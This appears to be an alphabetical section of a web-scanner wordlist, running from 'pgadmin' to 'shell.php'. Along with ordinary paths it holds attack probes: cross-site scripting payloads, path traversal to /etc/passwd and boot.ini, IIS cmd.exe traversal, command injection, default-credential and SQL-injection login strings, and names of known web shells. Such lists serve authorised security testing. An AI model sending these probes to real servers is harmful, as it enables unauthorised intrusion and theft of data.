pgadmin
pgadmin.log
pgp
pgsql
phf
phinx.yml
phishing
phone
phones
phorum
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/stats.php
photo
photo/
photo_album/apa_phpinclude.inc.php
photodata/
photodata/manage.cgi
photodetails
photogallery
photography
photo/manage.cgi
photos
php
php/
PHP
php168
php3
php4.ini
php5.fcgi
php5.ini
phpadmin
phpadmin/
phpadminmy/
phpads
phpadsnew
php-backdoor.php
phpbb
phpBB
phpbb2
phpBB2
phpBB2/includes/db.php
phpBB2/search.php?search_id=1\
phpbb3
phpBB3
phpBB/phpinfo.php
phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
php-bin
php-cgi
php-cgi.core
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
php_cli_errors.log
php-cli.ini
php-coolfile/action.php?action=edit&file=config.php
php.core
php-cs-fixer.phar
.phperr.log
php-error
php_error.log
php_error_log
php_errorlog
php-errors.log
php_errors.log
phperrors.log
phpEventCalendar
phpEventCalendar/file_upload.php
php/gaestebuch/admin/index.php
.php_history
phpimageview.php?pic=javascript:alert('Vulnerable')
php/index.php
phpinfo
php-info.php
php_info.php
phpinfo.php
phpinfo.php3
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php4
phpinfo.php5
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfos
phpinfos.php
.php-ini
php.ini
php.ini_
php.ini~
phpini.bak
php.ini-orig.txt
php.ini.sample
phpin.php
.phpintel
phpldapadmin
phpldapadmin/
phplist
phpliteadmin.php
phplive
php.lnk
php.log
phpma/
phpmailer
phpmanager/
phpmanual
phpmem/
phpmemcachedadmin/
php/mlog.html
php/mlog.phtml
phpmv2
phpmy/
phpMy/
phpmyad/
_phpmyadmin/
php-my-admin/
php-myadmin/
phpmy-admin/
phpmyadmin
phpmyadmin/
_phpMyAdmin/
phpMyAdmin
phpMyAdmin/
_pHpMyAdMiN/
_PHPMYADMIN/
phpmyadmin0/
phpMyAdmin0/
phpmyadmin1/
phpMyAdmin1/
phpmyadmin2
phpmyadmin2/
phpMyAdmin-2/
phpMyAdmin2
phpMyAdmin2/
phpMyAdmin-2.10.0/
phpMyAdmin-2.10.0.0/
phpMyAdmin-2.10.0.1/
phpMyAdmin-2.10.0.2/
phpMyAdmin-2.10.1.0/
phpMyAdmin-2.10.2.0/
phpMyAdmin-2.11.0.0/
phpMyAdmin-2.11.1.0/
phpMyAdmin-2.11.1.1/
phpMyAdmin-2.11.1.2/
phpMyAdmin-2.11.1-all-languages/
phpMyAdmin-2.2.3/
phpMyAdmin-2.2.6/
phpMyAdmin-2.5.1/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.5/
phpMyAdmin-2.5.5-pl1/
phpMyAdmin-2.5.5-rc1/
phpMyAdmin-2.5.5-rc2/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.6-rc1/
phpMyAdmin-2.5.6-rc2/
phpMyAdmin-2.5.7/
phpMyAdmin-2.5.7-pl1/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.0-alpha/
phpMyAdmin-2.6.0-alpha2/
phpMyAdmin-2.6.0-beta1/
phpMyAdmin-2.6.0-beta2/
phpMyAdmin-2.6.0-pl1/
phpMyAdmin-2.6.0-pl2/
phpMyAdmin-2.6.0-pl3/
phpMyAdmin-2.6.0-rc1/
phpMyAdmin-2.6.0-rc2/
phpMyAdmin-2.6.0-rc3/
phpMyAdmin-2.6.1/
phpMyAdmin-2.6.1-pl1/
phpMyAdmin-2.6.1-pl2/
phpMyAdmin-2.6.1-pl3/
phpMyAdmin-2.6.1-rc1/
phpMyAdmin-2.6.1-rc2/
phpMyAdmin-2.6.2/
phpMyAdmin-2.6.2-beta1/
phpMyAdmin-2.6.2-pl1/
phpMyAdmin-2.6.2-rc1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-pl1/
phpMyAdmin-2.6.3-rc1/
phpMyAdmin-2.6.4/
phpMyAdmin-2.6.4-pl1/
phpMyAdmin-2.6.4-pl2/
phpMyAdmin-2.6.4-pl3/
phpMyAdmin-2.6.4-pl4/
phpMyAdmin-2.6.4-rc1/
phpMyAdmin-2.6.5/
phpMyAdmin-2.6.6/
phpMyAdmin-2.6.9/
phpMyAdmin-2.7.0/
phpMyAdmin-2.7.0-beta1/
phpMyAdmin-2.7.0-pl1/
phpMyAdmin-2.7.0-pl2/
phpMyAdmin-2.7.0-rc1/
phpMyAdmin-2.7.5/
phpMyAdmin-2.7.6/
phpMyAdmin-2.7.7/
phpMyAdmin-2.8.0/
phpMyAdmin-2.8.0.1/
phpMyAdmin-2.8.0.2/
phpMyAdmin-2.8.0.3/
phpMyAdmin-2.8.0.4/
phpMyAdmin-2.8.0-beta1/
phpMyAdmin-2.8.0-rc1/
phpMyAdmin-2.8.0-rc2/
phpMyAdmin-2.8.1/
phpMyAdmin-2.8.1-rc1/
phpMyAdmin-2.8.2/
phpMyAdmin-2.8.2.3/
phpMyAdmin-2.8.3/
phpMyAdmin-2.8.4/
phpMyAdmin-2.8.5/
phpMyAdmin-2.8.6/
phpMyAdmin-2.8.7/
phpMyAdmin-2.8.8/
phpMyAdmin-2.8.9/
phpMyAdmin-2.9.0/
phpMyAdmin-2.9.0.1/
phpMyAdmin-2.9.0.2/
phpMyAdmin-2.9.0-rc1/
phpMyAdmin-2.9.1/
phpMyAdmin-2.9.2/
phpmyadmin3/
phpMyAdmin3/
phpMyAdmin-3.0.0.0-all-languages/
phpMyAdmin-3.0.0-rc1-english/
phpMyAdmin-3.0.1.0/
phpMyAdmin-3.0.1.0-english/
phpMyAdmin-3.0.1.1/
phpMyAdmin-3.1.0.0/
phpMyAdmin-3.1.0.0-english/
phpMyAdmin-3.1.1.0-all-languages/
phpMyAdmin-3.1.2.0/
phpMyAdmin-3.1.2.0-all-languages/
phpMyAdmin-3.1.2.0-english/
phpMyAdmin-3.4.3.1/
phpMyAdmin4/
phpMyAdmin-4.0.10.10-all-languages/
phpMyAdmin-4.0.10.10-english/
phpMyAdmin-4.3.13.3-all-languages/
phpMyAdmin-4.3.13.3-english/
phpMyAdmin-4.4.14.1-all-languages/
phpMyAdmin-4.4.14.1-english/
phpMyAdmin-4.5.0-rc1-all-languages/
phpMyAdmin-4.5.0-rc1-english/
phpmyadmin.backup/
phpMyAdminBackup/
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
phpmyadmin/scripts/setup.php
phpMyAdmin/scripts/setup.php
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
phpnuke
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phppgadmin
phppgadmin/
phpPgAdmin/
php.php
php/php4ts.dll
php/php.exe?c:\boot.ini
php/php.exe?c:\winnt\boot.ini
php/phpmyadmin/
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phpRedisAdmin/
phpredmin/
phprocketaddin/?page=../../../../../../../../../../boot.ini
phprocketaddin/?page=../../../../../../../../../../etc/passwd
phps
phpsecinfo/
phpshare/phpshare.php
phpsitemapng
phpSQLiteAdmin
.phpstorm.meta.php
phpsysinfo/
phpthumb
phpThumb/
phpThumb.php
.phptidy-cache
phptonuke.php?filnavn=/etc/passwd
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phpunit.phar
phpunit.xml
phpunit.xml.dist
php_uploads
.php-version
.phpversion
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
phtml
phymyadmin/
pic
pics
pics/
picts
picture
picturecomment
picture_library
pictures
pii
.pinerc
pinfo.php
ping
pingback
pipe
pipermail
pi.php
pi.php5
pip-log.txt
piranha
piranha/secure/passwd.php3
pivot
piwik
pix
pix/
pixel
pixelpost
pkg
pkginfo
pkgs
.pki
pks/lookup
pl
.placeholder
placeorder
places
plain
.plan
plate
platz_login
play
player
players
player.swf
.playground
playing
playlist
please
plenty
plesk-stat
pls
pls/admin
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
pls/ldc/admin_/
pls/portal30/admin_/
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/HTP.PRINT
pls/portal/null
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.signature
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/PORTAL.home
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/SELECT
pls/sample/admin_/help/..%255cplsql.conf
pls/simpledad/admin_/
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
pls/simpledad/admin_/dadentries.htm
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
plugin
plugins
plugins/editors/fckeditor
plugins/fckeditor
plugins.log
plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
plugins/spaw2/dialogs/dialog.php
plugins/tiny_mce/
plugins/tinymce/
plugins/upload.php
plugins/web.config
plupload
plus
plx
pm
__pma___/
p/m/a/
pma
pma/
PMA
PMA/
pma2005/
PMA2005/
pma4/
pmadmin/
pma/index.php
pma/scripts/setup.php
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pm/lib.inc.php
pmlite.php
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
pmwiki
pmyadmin/
pnadodb
png
pntables
pntemp
poc
podcast
podcasting
podcasts
poi
poker
pol
policies
policy
politics
poll
pollbooth
polls
pollvote
pom.xml
pool
pop
pop3
poppassd.php3+
popular
populate
popup
popup_content
popup_cvv
popup_image
popup_info
popup_magnifier
popup_poptions
popups
porn
porn/
port
portal
portals
portfolio
portfoliofiles
portlet
portlets
ports
pos
post
postcard
postcards
posted
postgres
postgresql
posthistory
postinfo
postinfo.html
posting
postings
postnuke
postnuke/html/index.php?module=My_eGallery
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
postnuke/index.php?module=My_eGallery
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
POSTNUKEMy_eGallery/public/displayCategory.php
postpaid
postreview
posts
post_thanks
posttocar
power
power_user
pp
ppc
ppcredir
p.php
pp.php?action=login
ppt
pr
pr0n
pr0n/
prd.i/pgen/
pre
preferences
prefetch.txt
preload
premiere
premium
prepaid
prepare
presentation
presentations
preserve
press
Press
presse
press_releases
pressreleases
pressroom
prev
preview
previews
previous
price
pricelist
prices
pricing
print
printable
printarticle
printenv
printer
printers
printmail
print_order
printpdf
printthread
printview
priv
priv8.php
privacy
Privacy
privacy-policy
privacy_policy
privacypolicy
privado/
privat
_private
_private/
private
private/
private2
privateassets
_private/form_results.htm
_private/form_results.html
_private/form_results.txt
private.key
private.mdb
privatemsg
private.nsf
_private/orders.htm
_private/orders.txt
_private/register.htm
_private/register.txt
_private/registrations.htm
_private/registrations.txt
private.sqlite
_private/_vti_cnf/
prive
privmsg
privs
prn
pro
probe
problems
proc
procedures
process
processform
process_order
.proclog
.procmailrc
procure
procurement
prod
prod/
prodconf
prodimages
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
producers
product
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
product_compare
productdetails
product_image
productimage
product_images
product_info
product_info.php
production
production.log
productquestion
product_reviews
products
Products
products_new
product-sort
productspecs
product_thumb
productupdates
produkte
professor
profil
.profile
profile
profile.php?u=JUNK(8)
profiles
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
profiling
proftpd
proftpdpasswd
prog
program
Program%20Files/
Program Files
programming
programs
progress
.project
.project/
project
project-admins
project/index.php?m=projects&user_cookie=1
.projectOptions
project.pbxproj
projects
Projects
.project.xml
project.xml
prometheus-all/index.php
promo
promos
promoted
promotion
promotions
pron/
proof
proofs
prop
prop-base
propel.ini
.properties
properties
property
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
props
prot
protect
protected
protected/
protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
protected/secret.html+
protection
protection.php
proto
provider
providers
proxies
proxy
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
prueba
prueba/
pruebas
pruebas/
prv
prv/
prv_download
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
ps
psd
psp
psql
.psql_history
.pst
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
pt
pt_BR
pt_config.inc
ptg_upgrade_pkg.log
ptopic
pub
pub/
pub/english.cgi?op=rmail
public
public/
publica/
publicar/
publication
publication_list.xml
publications
Publications
public_ftp
public_html
public_html.sql
publicidad
public.nsf
publico/
public/spaw2/dialogs/dialog.php
publish
published
publisher
publisher/
pubs
pull
purchase
purchase/
purchases
purchases/
purchasing
pureadmin
push
put
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
putty
putty.reg
pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
pvote/ch_info.php?newpass=password&confirm=password%20
pvote/del.php?pollorder=1%20
pw
pw/
pw_ajax
pw_api
pw_app
pwd
pwd.db
pw/storemgr.pw
pws.txt
pw.txt
py
.pydevproject
python
python/
.python-eggs
q
q1
q2
q3
q4
qa
qa/
qinetiq
qotd
qpadmin.nsf
qpid
.qqestore/
qsc
quarterly
queries
query
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query.log
question
questions
queue
queues
quick
quickplace/quickplace/main.nsf
quickstart
quickstart/qstart50.nsf
quickstart/wwsample.nsf
quikmail/nph-emumail.cgi?type=../%00
quikstore.cfg
quikstore.cgi
quiz
quote
quotes
r
R
r00t.php
r57
r57eng.php
r57.php
r57shell.php
r58.php
r99.php
radcontrols
radio
radmind
radmind-1
rail
rails
Rakefile
ramon
random
rank
ranks
.rar
rar
rarticles
rate
ratecomment
rateit
ratepic
rates
ratethread
rating
rating0
ratings
.raw
rb
.rbtp
rcLogin
rcp
rcs
RCS
rct
rd
rdf
.rdsTempFiles
read
Read
Read%20Me.txt
reademail.pl
reader
readfile
readfolder
read.me
readme
Readme
README
readmec.nsf
readme.eml
README.htm
readme.html
README.md
readme.nsf
readmes.nsf
readme.txt
Readme.txt
Read_Me.txt
README.txt
README.TXT
real
realaudio
realestate
RealMedia
receipt
receipts
receive
received
recent
recentservers.xml
recharge
recherche
recipes
recommend
recommends
record
recorded
recorder
records
recoverpassword
recovery
recycle
recycled
Recycled
red
reddit
redesign
redir
redirect
redirection
redirector
redirects
redis
ref
refer
reference
references
referer
referral
referrers
refuse
refused
reg
reginternal
region
regional
register
register/
registered
registered/
register.php
registration
registrations
registro
reklama
related
release
RELEASE_NOTES.txt
releases
religion
remind
reminder
remind_password
remote
remote.php/webdav/
.remote-sync.json
remotetracer
removal
removals
remove
removed
render
rendered
reorder
rep
repl
replica
replicas
replicate
replicated
replication
replicator
reply
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
repo
report
reporting
_reports
reports
reports/
reports list
reports.nsf
reports/rwservlet
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
reports/rwservlet/showenv
reports/rwservlet/showjobs
reports/rwservlet/showmap
reports/rwservlet/showmap?server=myserver
reports/temp/
repository
repost
reprints
reputation
req
reqs
request
requested
request.log
requests
require
requisite
requisition
requisitions
_res
res
research
Research
reseller
reseller/
resellers
reservation
reservations
resin
resin-admin
resize
resolution
resolve
resolved
resource
_resources
resources
Resources
resources/fckeditor
resources.xml
respond
responder
rest
restaurants
restore
restored
restore.php
restricted
restricted/
result
results
resume
resumes
retail
retail/
returns
reusablecontent
reverse
reversed
revert
reverted
review
reviews
reviews/newpro.cgi
.revision
revision.inc
revision.txt
rfid
.rhosts
rhtml
right
ro
roadmap
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
roam
roaming
robot
robotics
robots
.robots.txt
robots.txt
role
roles
roller
room
room/save_item.php
~root
~root/
root
root/
Root
RootCA.crt
rorentity
rorindex
rortopics
route
router
routes
rpc
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpc.php?q="><script>alert(document.cookie)</script>
rpc.php?q='&t='
r.php
rs
rsa
rss
RSS
rss10
rss2
rss20
rssarticle
rssfeed
rst.php
rsync
.rsync_cache
.rsync_cache/
rte
rtf
.rtlcssrc
rtm.log
ru
rub
.rubocop_todo.yml
.rubocop.yml
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
ruby
.ruby-gemset
.ruby-version
rule
rules
run
rus
.rvmrc
rwservlet
s
S
s1
.s3backupstatus
sa
sa2.php
safe
safety
sale
sales
sales/
sales.csv
salesforce
sales.log
sales.sql
sales.sql.gz
sales.txt
sales.xls
sam
sam._
samba
sam.bin
saml
sample
sample/
sample/faqw46
sample/framew46
sample/pagesw46
samples
samples/
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
samples/search.dll?query=<script>alert(document.cookie)</script>
samples/search/queryhit.htm
sample.txt
sample.txt~
san
sandbox
sa.php
.sass-cache/
sav
save
save/
saved
saves
sb
sbin
sc
sca/menu.jsp
scan
scanned
scans
scgi-bin
sched
schedule
scheduled
scheduling
schema
schema50.nsf
schemas
schema.sql
schema.yml
schemes
school
schools
science
scope
scozbook/view.php?PG=whatever
scr
scr/
scratc
scratch
screen
screen.php
screens
screenshot
screenshots
script
~/<script>alert('Vulnerable')</script>.asp
~/<script>alert('Vulnerable')</script>.aspx
~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
script>alert('Vulnerable')</script>.cfm
scripte
scriptlet
scriptlets
_scriptlibrary
scriptlibrary
scriptresource
_scripts
scripts
Scripts
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
scripts/admin.pl
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
scripts/Carello/Carello.dll
scripts/cfgwiz.exe
scripts/CGImail.exe
scripts/ckeditor/ckfinder/core/connector/asp/connector.asp
scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
scripts/ckeditor/ckfinder/core/connector/php/connector.php
scripts/contents.htm
scripts/convert.bas
scripts/counter.exe
scripts/cphost.dll
scripts/cpshost.dll
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/fpadmcgi.exe
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
scripts/httpodbc.dll
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/no-such-file.pl
scripts/postinfo.asp
scripts/proxy/w3proxy.dll
scripts/repost.asp
scripts/root.exe?/c+dir+c:\+/OG
scripts/samples/ctguestb.idc
scripts/samples/details.idc
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
scripts/samples/search/webhits.exe
scripts/setup.php
scripts/tools/ctss.idc
scripts/tools/dsnform
scripts/tools/dsnform.exe
scripts/tools/getdrvrs.exe
scripts/tools/newdsn.exe
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
scripts/weblog
scripts/wsisa.dll/WService=anything?WSMadmin
.scrutinizer.yml
sd
sdk
se
search
search/
Search
search97.vts
search.asp?Search=
search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
search.asp?term=<%00script>alert('Vulnerable')</script>
search/htx/sqlqhit.asp
search/htx/SQLQHit.asp
search/inc/
search/index.cfm?<script>alert(\"Vulnerable\")</script>
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
search?NS-query-pat=../../../../../../../../../../etc/passwd
searchnx
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
search.php?searchfor=\"><script>alert('Vulnerable');</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
search.php?zoom_query=<script>alert(\"hello\")</script>
searchreplacedb2cli.php
searchreplacedb2.php
search_result
search-results
search_results
searchresults
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search/sqlqhit.asp
search/SQLQHit.asp
searchurl
search.vts
sec
seccode
second
secondary
secret
secret/
Secret/
secret.nsf
secrets
secrets/
secring.bak
secring.pgp
secring.skr
section
sections
secure
secure/
secureauth
securecontrolpanel/
secured
secured/
secureform
secure_login
securelogin/1,2345,A,00.html
secureprocess
securimage
security
Security
security/web_access.html
seed
select
selectaddress
selected
.selected_editor
selection
self
sell
sell/
sem
seminar
seminars
.sencha/
send
sendform
sendfriend
sendmail
sendmessage
send_order
send-password
sendphoto.php
sendpm
send_pwd
sendthread
sendto
send_to_friend
sendtofriend
sensepost
sensor
sent
sentemails.log
seo
serial
serv
serve
server
server/
Server
Server/
ServerAdministrator
server_admin_small
server.cfg
SERVER-INF
server-info
server.log
Server.php
servers
servers/
servers/link.cgi
server_stats
server_stats/
server-status
server-status/
server.xml
service
service/
service.asmx
servicelist
services
services/
Services
servicio
servicio/
servicios
servicios/
servlet
Servlet
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
servlet/AdminServlet
servlet/allaire.jrun.ssi.SSIFilter
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
servlet/com.newatlanta.servletexec.JSP10Servlet/
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.unify.servletexec.UploadServlet
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
servlet/Counter
servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
servlet/DateServlet
servlet/FingerServlet
servlet/gwmonitor
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlet/PrintServlet
servlets
Servlets
servlet/SchedulerTransfer
servlet/SearchServlet
servlet/ServletManager
servlet/SessionManager
servlet/SessionServlet
servlets-examples
servlet/SimpleServlet
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
servlet/SnoopServlet
servlet/sq1cdsn
servlet/sqlcdsn
servlets/SchedulerTransfer
servlet/sunexamples.BBoardServlet
servlets/weboam/oam/oamLogin
servlet/webacc
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
servlet/webacc?User.html=noexist
servlet/webpub
serv-u.ini
sess
session
session/
session/admnlogin
sessionid
sessionlist
sessions
sessions/
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
set
setcurrency
setlocale
setpasswd.cgi
SetSecurity.shm
setting
.settings
.settings/
settings
settings/
settings.bak
settings.dist
settings.ini
.settings/.jsdtscope
settings.old
.settings/org.eclipse.core.resources.prefs
.settings/org.eclipse.php.core.prefs
.settings/org.eclipse.wst.common.project.facet.core.xml
.settings/org.eclipse.wst.jsdt.ui.superType.container
.settings/org.eclipse.wst.jsdt.ui.superType.name
settings.php
settings.php~
settings.php1
settings.php2
settings.php.bak
settings.php.dist
settings.php.old
settings.php.save
.settings.php.swp
settings.php.swp
settings.php.templ
settings.php.txt
settings.py
settings.save
settings/site.ini
settings.swp
settings.txt
settings.xml
setup
setup/
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
setup.nsf
setup.php
setup.sql
setupweb.nsf
setvatsetting
sex
sf
sftp-config.json
sg
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
.sh
sh
Sh3ll.php
shadow
shaken
share
shared
shares
shell
shell/
shell.php
